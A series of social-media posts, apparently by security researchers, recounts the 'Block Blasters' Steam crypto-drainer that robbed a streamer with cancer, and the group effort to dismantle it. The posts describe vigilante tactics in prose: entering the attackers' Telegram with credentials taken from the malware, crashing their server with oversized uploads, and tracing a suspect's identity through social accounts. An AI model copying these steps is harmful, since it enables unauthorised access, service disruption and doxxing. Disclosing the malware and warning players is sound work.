The full technical report details how we took down the C2 infrastructure of Block Blasters drainer malware that @valvesoftware allowed on their platform. We spoke to the threat actors who had no remorse for stealing from a terminally ill cancer patient docs.google.com/document/d/1…

This has been well documented as being exploited in the past. However, it is still being used to target individuals and the developers have still not added mitigations or appropriate warnings.

PSA: Terraria mods in tModLoader allow for arbitrary code execution. Unsolicited invites to servers with auto mod downloads should be treated as malware. Unfortunately threat actors have already exploited this. This is not an easy fix for developers. Technical report will follow

If you had your crypto stolen and your account compromised to spread the malware by the threat actors behind Block Blaster, Chemia and PirateFi. Please DM me with the amount stolen and addresses. Also export all of the data from those accounts if possible. Thanks ♥️

People are asking how the OSINT nerds found the guy that drained the cancer bro. Well, it's very shrimple The shitty malware sent all the stolen data to a Telegram the scammers made. We connected to the Telegram channel using the same credentials that were inside of the shitty malware Inside the channel was the scammer(s) We got their Telegram IDs OSINT nerds used their Telegram IDs to see if they were in any other public facing chatrooms. One of the scammers in there was in several fraud chatrooms. He advertised looking for a video game programmer to make a basic 2D game. He also advertised needing help with some malware stuff. In a different chatroom he talked about how much he likes skateboarding. In a different channel he shared his Instagram and was sharing photos of himself next to expensive cars Then, OSINT nerds looked at his Instagram which had a LinkTree. His LinkTree linked to literally everything about the guy including his YouTube, PayPal, Kick, Twitter, etc. So either he is a master of disguise, and ran a year long detrace campaign to throw off OSINT nerds in the event he's caught scamming Or alternatively, he wasn't aware public Telegram chatrooms are public and could be searched easily.

Compiled list of steam users affected by "BlockBlasters" crypto drainer compiled from all the server logs the attackers left exposed publicly on their webserver. In depth victim data can be provided to correct agencies. (Parts removed for victim privacy) pastebin.com/iLd4PJnn

Hello, I've received a bunch of notifications today about the "Block Blaster" ... pseudo-takedown that occurred in response to a group of individuals spearphishing and cryptodraining a cancer patient. I appreciate everyone thanking me or giving me a congratulations. I am not fully responsible for the actions which occurred. I did reverse engineer the malware and identify infrastructure, however any work done was accelerated due to a group of people. When I announced I was going to look at the video game closer to determine if it was malware (it was malware), a person contacted me and spun up a group of like minded people interested in examining Block Blaster closer. Here are the cool and badass people I worked with: - @zachxbt - @John5725424446 - @andreee_eeeeee - @escrow_ - @C4L38 - @defidownsin - "J" - Random nerds who provided "tips" to us I've never really spoken with these people before, omit ZachXBT, but each of us was angry from what we had seen. Before I get off for the evening I want to note that I am uploading Block Blaster to the malware library. "./Samples/Families/Block Blaster" I have also synced all samples in Triage and VirusTotal if you want to examine them closer. I noted the SHA256 hashes in a previous post.

Thanks to the boys: @andreee_eeeeee @vxunderground @escrow_ @C4L38 @DeFiDownsin @asdfxzqwertz for all your efforts <3 and especially to @rastalandTV for being awesome and showing just how strong of a person he is.

tl;dr of today > @rastalandTV gets crypto drained > he has stage 4 cancer > hes targeted specifically for his cancer treatment money > loses $32,000 > nerds band together > @ZssBecker donates $30,000 to him > malware nerds come together > drainer infra found > pull all victim data from infra > victims will be notified > all malware flagged > osint nerds come together > find drainers info from their telegram ids > find info from their steam ids tl;dr tl;dr stage 4 cancer bro gets fucked over, 50+ nerds band together to undo the damage fuck cancer

This is the first batch file, there's another inside a password protected 7z file inside the game files

4 -> The main channel administrator is this individual who enjoys stealing from cancer patients. I hope somebody like @zachxbt is able to find you, and you have to live your life being publicly shamed that you stole from a stage 4 cancer patient.

3 -> Given they had exposed their telegram bot's source code, we were able to enter their telegram channel and get a list of the administrators in the channel. Their bot allowed them to whitelist and target specific users in their whitelist, some of which I'll attach.

2 -> The C2 allowed for arbitrary file upload (courtesy of chat GPT's poor security) which we obviously took advantage of by uploading a series of 1GB files. Eventually taking down the python3 SimpleHTTP server running.

1 -> Me and a group of fellow researchers have managed to stop the spread of this stealer distributed on a steam game called Block Blasters. The C2 infrastructure was open along with infection logs which @rastalandTV is unfortunately located in.

Dawg, why did these cryptodrainer nerds leave their Telegram credentials exposed in plain text in their drainer?

Yesterday a video game streamer named @rastalandTV inadvertently livestreamed themselves being a victim of a cryptodraining campaign. This particular spearphishing campaign is extraordinarily heinous because RastaLand is suffering from Stage-4 Sarcoma and is actively seeking donations for their cancer treatment. They lost $30,000 of the money which was designated for their cancer treatment. In the steam clip their friend tries to console them while they cry out, "I am broken now." They were contacted by an unknown person who requested they play their video game demo (downloadable from Steam). In exchange for RastaLand playing their video game demo on stream, they would financially compensate them. Unfortunately, the Steam game was actually a cryptodrainer masquerading as a legitimate video game.